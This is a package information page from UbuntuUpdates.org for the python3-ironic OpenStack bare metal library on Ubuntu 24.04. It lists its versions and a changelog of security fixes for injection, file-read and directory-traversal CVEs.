UbuntuUpdates.org

Package "python3-ironic"

Name: python3-ironic

Description:

Openstack bare metal provisioning service - Python 3 library
Latest version: 1:24.1.1-0ubuntu1.3
Release: noble (24.04)
Level: security
Repository: universe
Head package: ironic
Homepage: https://opendev.org/openstack/ironic

Links

All versions of this package
Bug fixes

List of files in package
Repository home page

Download "python3-ironic"

All arch deb package
APT INSTALL

Other versions of "python3-ironic" in Noble

Repository Area Version
base universe 1:24.1.1-0ubuntu1
updates universe 1:24.1.1-0ubuntu1.3

Changelog

Version: 1:24.1.1-0ubuntu1.3 2026-06-11 22:07:54 UTC

  ironic (1:24.1.1-0ubuntu1.3) noble-security; urgency=medium

  * SECURITY UPDATE: sanitize kernel_append_params to prevent injection
    - d/p/cve-2026-46447-sanitize-kernel-append-params.patch: Validate
      kernel_append_params against a kernel command line grammar and
      reject malformed parameters. Add disable_kernel_parameter_parsing
      config option.
    - CVE-2026-46447
  * SECURITY UPDATE: disable insecure driver_info pxe_template override
    - d/p/lp2148319-disable-pxe-template-override.patch: Remove direct
      file path support for pxe_template to prevent privilege escalation.
    - CVE-2026-44917
  * SECURITY UPDATE: prevent directory traversal in ISO9660 image handling
    - d/p/lp2148333-directory-traversal-iso9660.patch: Validate ISO9660
      path entries to reject directory traversal attempts in config drive
      ISO images.
    - CVE-2026-48681

 -- Hemanth Nakkina <email address hidden> Wed, 03 Jun 2026 14:49:43 +0530
Source diff to previous version
CVE-2026-46447 OpenStack Ironic before 35.0.2 allows Boot Script Injection of an iPXE script if the attacker can set node.driver_info or node.instance_info.
CVE-2026-44917 OpenStack Ironic before 35.0.2 allows a malicious authenticated project admin or manager to read local files on the Ironic conductor via a pxe_templa
CVE-2026-48681 OpenStack Ironic through before 35.0.2 allows file overwrite via directory traversal during deployment with a crafted ISO image.

Version: 1:24.1.1-0ubuntu1.2 2024-09-04 18:07:01 UTC

  ironic (1:24.1.1-0ubuntu1.2) noble-security; urgency=medium

  * SECURITY UPDATE: ensure underlying environment details not leaked when a
    maliciously crafted image is used (LP: #2071740).
    - d/p/CVE-2024-44082.patch: Harden all image handling and conversion code.
    - d/control: Add qemu-utils to Build-Depends to allow unit tests to run
      qemu-img.
    - CVE-2024-44082

 -- Felipe Reyes <email address hidden> Tue, 03 Sep 2024 16:06:12 +0100
2071740 [OSSA-2024-003] Unvalidated image data passed to qemu-img (CVE-2024-44082)


About   -   Send Feedback to @ubuntu_updates